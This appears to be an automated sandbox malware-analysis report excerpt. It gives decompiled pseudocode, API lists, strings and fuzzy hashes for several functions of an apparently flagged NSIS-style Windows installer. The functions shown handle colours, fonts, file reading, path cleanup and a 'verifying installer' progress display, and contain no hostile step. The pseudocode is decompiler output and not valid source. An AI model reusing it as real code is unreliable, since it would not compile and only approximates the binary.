Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404512
0x004045c8
0x00000000
0x004045c8
0x00404523
0x00404527
0x00000000
0x00404541
0x00404541
0x0040454a
0x00000000
0x00000000
0x0040454c
0x00404558
0x0040455b
0x0040455b
0x00404561
0x00404567
0x00404567
0x00404573
0x00404579
0x00404580
0x00404583
0x00404586
0x00404588
0x00404588
0x00404590
0x00404596
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045b0
0x004045b0
0x004045c0
0x004045c0
0x00000000
0x004045c3

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067c6
0x004067cf
0x004067e6
0x004067e6
0x004067ed
0x004067f9
0x004067f9
0x004067fc
0x004067ff
0x00406804
0x00406806
0x0040680f
0x00406813
0x00406830
0x00406838
0x00406838
0x0040683d
0x0040683f
0x00406842
0x00406847
0x00406848
0x0040684c
0x0040684c
0x0040684d
0x00406854
0x00406856
0x0040685d
0x00000000
0x00000000
0x00406865
0x0040686b
0x00000000
0x00000000
0x00000000
0x0040686b
0x00406870

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816
C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e62
0x00404e6f
0x00404e75
0x00404eb3
0x00404eb3
0x00404ec2
0x00404ec9
0x00000000
0x00404ecb
0x00404e77
0x00404e86
0x00404e8e
0x00404e91
0x00404ea3
0x00404ea9
0x00404eb0
0x00000000
0x00404eb0
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Strings

Tahoma, xrefs: 00401EB9

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Tahoma
API String ID: 2584051700-3580928618
Opcode ID: 7613f5a947f4bbf8195753a17fba9eaca46e1d6fc564812dac8d5fa739d0f051
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 7613f5a947f4bbf8195753a17fba9eaca46e1d6fc564812dac8d5fa739d0f051
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x7306a
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0007306A,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 70B22655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E70B22655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E70B212BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M70B22784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x70b2407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x70b2409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E70B21510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x70b2506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x70b2506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x70b2506c);
								goto L17;
							case 5:
								_push( *0x70b2506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x70b25000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E70B21381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E70B21312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x70b2265f
0x70b22661
0x70b22665
0x70b22674
0x70b22678
0x70b2267d
0x70b2267d
0x70b22685
0x70b2268c
0x70b22692
0x00000000
0x70b22699
0x00000000
0x00000000
0x70b226a1
0x70b226a5
0x70b226a8
0x70b226ac
0x70b226b3
0x70b226b7
0x70b226bd
0x70b226bf
0x70b226c1
0x70b226c1
0x70b226c8
0x00000000
0x00000000
0x70b226d1
0x00000000
0x00000000
0x70b226d8
0x70b226de
0x70b226e8
0x70b226ee
0x70b226f3
0x00000000
0x00000000
0x70b22714
0x00000000
0x00000000
0x70b226fa
0x70b22700
0x70b22701
0x70b22703
0x00000000
0x00000000
0x70b2271c
0x70b2271e
0x70b22724
0x70b2272a
0x70b2272a
0x00000000
0x00000000
0x70b22692
0x70b2272d
0x70b2272d
0x70b22732
0x70b22743
0x70b22743
0x70b22749
0x70b2274e
0x70b22753
0x70b2275f
